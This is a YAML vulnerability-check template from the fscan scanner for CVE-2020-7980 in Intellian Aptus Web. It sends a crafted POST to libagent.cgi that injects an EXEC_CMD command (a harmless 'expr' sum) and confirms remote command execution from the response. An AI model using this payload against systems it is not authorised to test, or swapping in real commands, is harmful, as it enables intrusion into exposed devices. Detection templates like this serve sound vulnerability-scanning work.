fscan/Web_Scan/pocs/satellian-cve-2020-7980-rce...

21 lines
665 B
YAML

name: poc-yaml-satellian-cve-2020-7980-rce
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
rules:
- method: POST
path: >-
/cgi-bin/libagent.cgi?type=J
headers:
Cookie: ctr_t=0; sid=123456789
Content-Type: application/json
body: >-
{"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "expr {{r1}} + {{r2}}", "F": "EXEC_CMD"}, "V_": 1}
follow_redirects: true
expression: response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: JingLing(https://hackfun.org/)
Affected version: Intellian Aptus Web <= 1.24
links:
- https://nvd.nist.gov/vuln/detail/CVE-2020-7980